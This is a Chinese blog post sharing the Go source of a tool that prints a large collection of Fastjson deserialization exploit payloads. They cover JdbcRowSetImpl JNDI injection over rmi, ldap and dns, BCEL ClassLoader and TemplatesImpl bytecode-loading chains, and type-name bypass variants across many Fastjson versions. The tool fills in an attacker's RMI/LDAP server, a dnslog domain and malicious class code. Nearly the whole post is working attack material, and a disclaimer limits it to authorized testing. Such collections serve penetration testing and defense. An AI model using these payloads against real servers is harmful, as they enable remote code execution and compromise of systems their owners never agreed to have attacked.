首页 > 其他分享 >Fastjson的payload收集

Fastjson的payload收集

时间:2024-07-17 09:18:50浏览次数:16  
标签:Fastjson code 收集 -- sun JdbcRowSetImpl com payload

What

无第三方依赖
收集了网络上的多种payload,方便进行fuzz测试
提供了自动替换payload的功能,一次性为所有payload插入rmi地址/dnslog

Help

--list:以清单的形式打印,方便作为字典进行fuzz

--address:服务器地址(无需rmi://前缀),如11.22.33.44/exp、eval.com/rce

--dns:dnslog的地址,不同payload会添加不同的子域名,方便查看是哪一条payload

--code:加载恶意类的code,需要自行添加$$BCEL$$的开头

Example

FjsonShowPload.exe --list --address hackserver.com --dns dnslog.com
image

FjsonShowPload.exe --address hackserver.com --dns dnslog.com
image

注意:重定向到文件后,需要去掉banner和结尾的确认信息,或者直接在代码中去除

How

将代码保存为 FjsonSoPload.go

进入命令行窗口:go build ./

即可得到一个 FjsonSoPload.exe

Code

package main

import (
	"flag"
	"fmt"
)

var id = 1
var dt = false
var cl = true
var code string
var Address string
var dnslog string
var Pal, Hep, Vson string

func main() {
	fmt.Println(" ████████  ██                            ████████ ██                          ███████   ██                         ██\n░██░░░░░  ░░                            ██░░░░░░ ░██                         ░██░░░░██ ░██                        ░██\n░██        ██  ██████  ██████  ███████ ░██       ░██       ██████  ███     ██░██   ░██ ░██  ██████   ██████       ░██\n░███████  ░██ ██░░░░  ██░░░░██░░██░░░██░█████████░██████  ██░░░░██░░██  █ ░██░███████  ░██ ██░░░░██ ░░░░░░██   ██████\n░██░░░░   ░██░░█████ ░██   ░██ ░██  ░██░░░░░░░░██░██░░░██░██   ░██ ░██ ███░██░██░░░░   ░██░██   ░██  ███████  ██░░░██\n░██     ██░██ ░░░░░██░██   ░██ ░██  ░██       ░██░██  ░██░██   ░██ ░████░████░██       ░██░██   ░██ ██░░░░██ ░██  ░██\n░██    ░░███  ██████ ░░██████  ███  ░██ ████████ ░██  ░██░░██████  ███░ ░░░██░██       ███░░██████ ░░████████░░██████\n░░      ░░░  ░░░░░░   ░░░░░░  ░░░   ░░ ░░░░░░░░  ░░   ░░  ░░░░░░  ░░░    ░░░ ░░       ░░░  ░░░░░░   ░░░░░░░░  ░░░░░░ \n")

	detail := flag.Bool("list", false, "不展示payload细节与利用方式(默认展示)")
	code2 := flag.String("code", "恶意code", "恶意code,自行添加$$BCEL$$开头")

	dnslog2 := flag.String("dns", "default.com", "dnslog")
	Address2 := flag.String("address", "127.0.0.1/exp", "rmi/ldap地址(无需带协议名)")

	flag.Parse()
	dt = !(*detail)
	dnslog = *dnslog2
	code = *code2
	Address = *Address2
	defer fmt.Println("\nYour input :", dnslog, " | ", Address)
	//两个版本tomcat的BasicDataSource__bcel
	Show_org_apache_tomcat_dbcp_dbcp_BasicDataSource()

	//JdbcRowSetImpl__jndi
	Show_com_sun_rowset_JdbcRowSetImpl()

	//JdbcRowSetImpl__jndi__bypass1.2.25
	Bypass25_41_com_sun_rowset_JdbcRowSetImpl()

	//JdbcRowSetImpl__jndi__bypass1.2.41--1.2.42
	Bypass41_42_com_sun_rowset_JdbcRowSetImpl()
	//缓存绕过< 1.2.47
	//{ "a": { "@type": "java.lang.Class",  "val": "com.sun.rowset.JdbcRowSetImpl"},  "b": { "@type": "com.sun.rowset.JdbcRowSetImpl",  "dataSourceName": "rmi://ip:9999/exp",  "autoCommit": true}}

	//bcel链的绕过
	Bypass25_41_BasicDataSource()
	other()
	//fmt.Println("\nspring\\tomcat Echo")

}

func Show_org_apache_tomcat_dbcp_dbcp_BasicDataSource() {
	Pal = `{"@type":"org.apache.tomcat.dbcp.dbcp.BasicDataSource","driverClassLoader":{"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName":"` + code + `"}`
	Hep = `BCEL加载恶意字节码的利用链,正连加载恶意字节码,无需出网`
	Vson = `Fastjson <= 1.2.24、tomcat-dbcp <= 7、JDK < 8u251`

	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader":{"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName":"` + code + `"}`
	Hep = `BCEL加载恶意字节码的利用链,正连加载恶意字节码,无需出网`
	Vson = `Fastjson <= 1.2.24、tomcat-dbcp > 7、JDK < 8u251`
	ShowPayload(Pal, Hep, Vson)
}

func Show_com_sun_rowset_JdbcRowSetImpl() {
	//{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":true}
	Pal = `{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-RMI利用链exp,反连`
	Vson = `Fastjson <= 1.2.24`
	ShowPayload(Pal, Hep, Vson)

	//ldap
	Pal = `{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-ldap利用链exp,反连`
	Vson = `Fastjson <= 1.2.24`
	ShowPayload(Pal, Hep, Vson)

	//dnslog
	Pal = `{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"dns://poc1.` + dnslog + `","autoCommit":true}`
	Hep = `JNDI注入-DNSlog利用链poc,请求dnslog`
	Vson = `Fastjson <= 1.2.24`
	ShowPayload(Pal, Hep, Vson)
}

func Bypass25_41_BasicDataSource() {
	//{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":true}
	Pal = `{"@type": "Lorg.apache.tomcat.dbcp.dbcp2.BasicDataSource;","driverClassLoader": {"@type": "Lcom.sun.org.apache.bcel.internal.util.ClassLoader;"},"driverClassName": "` + code + `"}`
	Hep = `BCEL利用链exp,正连,类名前后加L与;进行绕过`
	Vson = `Fastjson < 1.2.41`
	ShowPayload(Pal, Hep, Vson)

}

func other() {
	//{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"$type$://$ip$/payload2","autoCommit":true}} #Fastjson <=1.2.24
	Pal = `{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"rmi://` + Address + `","autoCommit":true}}`
	Hep = `JNDI注入`
	Vson = `Fastjson <= 1.2.24`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://` + Address + `","autoCommit":true}}`
	Hep = `JNDI注入`
	Vson = `Fastjson <= 1.2.24`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"dns://ubm.` + dnslog + `","autoCommit":true}}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson <= 1.2.24`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"$type$://$ip$/payload3","autoCommit":true} #Fastjson<=1.2.41
	//{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"$type$://$ip$/payload4","autoCommit":true} #Fastjson<=1.2.42
	//{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"$type$://$ip$/payload5","autoCommit":true} #Fastjson<=1.2.43
	Pal = `{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"rmi://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.43`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.43`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"dns://mik.` + dnslog + `","autoCommit":true}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.43`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"$type$://$ip$/payload6"}} #Fastjson<=1.2.45
	Pal = `{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://` + Address + `"}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.45`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://` + Address + `"}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.45`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"dns://jds.` + dnslog + `"}}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.45`
	ShowPayload(Pal, Hep, Vson)

	//{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"$type$://$ip$/payload7","autoCommit":true}} #Fastjson<=1.2.47
	Pal = `{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://` + Address + `","autoCommit":true}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.47`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://` + Address + `","autoCommit":true}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.47`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"dns://dbjn.` + dnslog + `","autoCommit":true}}`
	Hep = `dnsliog`
	Vson = `Fastjson<=1.2.47`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"$type$://$ip$/payload8"} #Fastjson<=1.2.62,CVE-2020-8840
	Pal = `{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.62`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.62`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"dns://cben.` + dnslog + `"}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.62`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"$type$://$ip$/payload9"} #Fastjson<=1.2.66
	Pal = `{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"rmi://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"dns://igjt.` + dnslog + `"}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"$type$://$ip$/payload10"} #Fastjson<=1.2.66
	Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"rmi://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"dns://atbc.` + dnslog + `"}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"$type$://$ip$/payload11"}} #Fastjson<=1.2.66
	Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"rmi://` + Address + `"}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://` + Address + `"}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"dns://eget.` + dnslog + `"}}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"$type$://$ip$/payload12"} #Fastjson<=1.2.67
	Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"rmi://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"dns://antr.` + dnslog + `"}`
	Hep = `dnslog`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)
	//{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["$type$://$ip$/payload13"],"Realms":[""]} #Fastjson<=1.2.67
	Pal = `{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["rmi://` + Address + `"],"Realms":[""]}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://` + Address + `"],"Realms":[""]}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["dns://siro.` + dnslog + `"],"Realms":[""]}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"com.caucho.config.types.ResourceRef","lookupName":"$type$://$ip$/payload14"} #Fastjson<=1.2.67
	Pal = `{"@type":"com.caucho.config.types.ResourceRef","lookupName":"rmi://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"com.caucho.config.types.ResourceRef","lookupName":"ldap://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"com.caucho.config.types.ResourceRef","lookupName":"dns://caco.` + dnslog + `"}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"$type$://$ip$/payload15"}} #Fastjson<=1.2.67
	Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"rmi://` + Address + `"}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"ldap://` + Address + `"}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"dns://jti.` + dnslog + `"}}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"$type$://$ip$/payload16"} #Fastjson<=1.2.68
	Pal = `{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"dns://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.68`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.68`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"rmi://w9.` + dnslog + `"}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.68`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"$type$://$ip$/payload17"} #Fastjson<=1.2.68
	Pal = `{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"rmi://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.68`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.68`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"dns://ppx.` + dnslog + `"}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.68`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"$type$://$ip$/payload18"} #未知
	Pal = `{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"rmi://` + Address + `"}`
	Hep = `jndi`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"ldap://` + Address + `"}`
	Hep = `jndi`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"dns://cons.` + dnslog + `"}`
	Hep = `dnslog`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"$type$://$ip$/payload19","rollbackOnly":null} #未知
	Pal = `{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"rmi://` + Address + `","rollbackOnly":null}`
	Hep = `jndi`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"ldap://` + Address + `","rollbackOnly":null}`
	Hep = `jndi`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"dns://openjpa.` + dnslog + `","rollbackOnly":null}`
	Hep = `dnslog`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"$type$://$ip$/payload20"} #未知
	Pal = `{"@type": "Lorg.apache.tomcat.dbcp.dbcp2.BasicDataSource;","driverClassLoader": {"@type": "Lcom.sun.org.apache.bcel.internal.util.ClassLoader;"},"driverClassName": "` + code + `"}`
	Hep = `bcel`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["###EVIL_CODE###"],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}
	Pal = `{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["` + code + `"],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}`
	Hep = `加载恶意类`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)

	//TemplatesImpl2.tpl:
	//{"@type":"org.apache.xalan.xsltc.trax.TemplatesImpl","_bytecodes":["###EVIL_CODE###"],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}
	Pal = `{"@type":"org.apache.xalan.xsltc.trax.TemplatesImpl","_bytecodes":["` + code + `"],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}`
	Hep = `加载恶意类`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)
}

func Bypass25_41_com_sun_rowset_JdbcRowSetImpl() {
	//{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":true}
	Pal = `{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-RMI利用链exp,反连,类名前后加L与;进行绕过`
	Vson = `Fastjson < 1.2.41`
	ShowPayload(Pal, Hep, Vson)

	//ldap
	Pal = `{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-ldap利用链exp,反连,类名前后加L与;进行绕过`
	Vson = `Fastjson < 1.2.41`
	ShowPayload(Pal, Hep, Vson)

	//dnslog
	Pal = `{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"dns://poc2.` + dnslog + `","autoCommit":true}`
	Hep = `JNDI注入-DNSlog利用链poc,请求dnslog,类名前后加L与;进行绕过`
	Vson = `Fastjson < 1.2.41`
	ShowPayload(Pal, Hep, Vson)
}

func Bypass41_42_com_sun_rowset_JdbcRowSetImpl() {
	//{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":true}
	Pal = `{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-RMI利用链exp,反连,类名前后双写L与;进行绕过`
	Vson = ` 1.2.41 <= Fastjson < 1.2.42`
	ShowPayload(Pal, Hep, Vson)

	//ldap
	Pal = `{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-ldap利用链exp,反连,类名前后双写L与;进行绕过`
	Vson = `1.2.41 <= Fastjson < 1.2.42`
	ShowPayload(Pal, Hep, Vson)

	//dnslog
	Pal = `{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"dns://poc2.` + dnslog + `","autoCommit":true}`
	Hep = `JNDI注入-DNSlog利用链poc,请求dnslog,类名前后双写L与;进行绕过`
	Vson = `1.2.41 <= Fastjson < 1.2.42`
	ShowPayload(Pal, Hep, Vson)
}

func ShowPayload(str ...string) {

	const redColor = "\033[31m"
	const resetColor = "\033[0m"

	if dt {
		fmt.Println("┌─────────PayloadID:", id)
		id++
		fmt.Printf("%s%s%s\n", redColor, str[0], resetColor)
	} else {
		fmt.Println(str[0])
	}
	if dt {
		fmt.Println("│\n├───[+]payload说明:")
		fmt.Print("│	")
		fmt.Println(str[1])
		defer fmt.Println("└──────────────────────────────────────────────────────────────────────────────┘\n")
	}
	if dt {
		fmt.Println("│\n├───[+]验证过的版本:")
		fmt.Print("│	")
		fmt.Println(str[2])
		fmt.Println("│	注:版本号仅供参考                                        Fastjson SEC──┐") //
	}
}

相信国家相信党,黑客没有好下场
请遵守相关法律法规,文中技术仅用于有授权的安全测试,禁止用于非法活动!
本文章仅面向拥有合法授权的渗透测试安全人员及进行常规操作的网络运维人员。
在操作的过程中,您应确保自己的所有行为符合当地法律法规,且不得进行违反中国人民共和国相关法律的活动。
作者不承担用户擅自使用相关技术从事任何违法活动所产生的任何责任。

标签:Fastjson,code,收集,--,sun,JdbcRowSetImpl,com,payload
From: https://www.cnblogs.com/Aixve/p/18306568

相关文章

  • web安全前期的信息收集工作
    首先你需要获得目标网站的真实IP地址,可以通过IP反查域名(web查询)、域名查询IP(web查询)等查出其IP,方便进行后续操作。有个小技巧:CDN流量收费高,所以很多站长可能只会对主站或者流量大的子站点做了CDN,而很多小站子站点又跟主站在同一台服务器或者同一个C段内,此时就可以通过查询子域......
  • iOS开发基础105-Xcode收集Crashs的各种方法
    Xcode提供了一整套工具和功能来帮助开发者收集、分析和处理应用崩溃报告。通过这些工具,开发者可以追踪和解析崩溃日志,以更加准确和及时地修复问题。以下是详细介绍Xcode工具收集崩溃报告的各种方法。一、通过设备获取崩溃报告1.连接设备将iOS设备通过USB连接到您的Mac......
  • Retrofit2 使用FastJson作为Converter.m
    首先创建一个FastJsonRequestBodyConverter类packagecom.rrc.core.net.converter;importcom.alibaba.fastjson.JSON;importjava.io.IOException;importokhttp3.MediaType;importokhttp3.RequestBody;importretrofit2.Converter;/***=========================......
  • 【信息收集】 端口信息收集
    端口简介在Internet上,各主机间通过TCP/IP协议发送和接受数据包,各个数据包根据其目的主机的IP地址来进行互联网络中的路由选择,从而顺利的将数据包顺利的传送给目标主机但当目的主机运行多个程序时,目的主机该把接受到的数据传给多个程序进程中的哪一个呢?端口机制的引入就是为了......
  • 【信息收集】 IP信息收集
    IP反查域名:http://stool.chinaz.com/samehttps://tools.ipip.net/ipdomain.phphttps://www.dnsgrep.cn/https://site.ip138.com/如果渗透目标为虚拟主机,那么通过IP反查到的域名信息很有价值,因为一台物理服务器上面可能运行多个虚拟主机。这些虚拟主机有不同的域名,但通常......
  • 连载|浅谈红队中的外网信息收集(一)
    前言最近在对以往所学习的有关红队的知识点进行梳理总结,这里主要参考了ATT&CK矩阵模型,不过对其进行了简化,同时加入了一些国内特有的情况放了进去。大体上会按照外网信息收集、打点、权限维持、提权、内网信息收集、横向移动、痕迹清理这样的顺序展开。本文来源无问社区,更......
  • web渗透——信息收集
    切记:未经授权,禁止对任何网站进行渗透测试摘要whois查询端口扫描CMS识别DNS记录备案信息旁站查询子域名查询CND绕过WAF识别资产收集反查域名证书查询空间测绘威胁情报源码泄露whois查询常用网址:爱站:https://www.aizhan.com/站长之家:https://whois.chinaz.com......
  • 04—什么是需求?需求收集的方法有哪些?
    一、需求的定义其本质就是用户的预期,而预期与现状之间存在差异,就形成了需求另外,用户提出需求时,都会基于某种目的所提出的问题、建议、或者想法原始需求对于这些需求,从某种角度上来说,他们可以算是“原始需求”,因为他们没有经过任何分析,或者是没有经过任何额外解读的......
  • 渗透测试-信息收集工具
    domainscan调用subfinder被动收集,调用ksubdomain进行dns验证泛解析,CDN判断获取domain相关的web(host:port)资产,使用webscan扫描webscan支持http/httpsscheme自动判断获取statusCode、contentLength、favicon、iconHash、title、wappalyzer、fin"title自动中文解码j......
  • 信息收集-导航
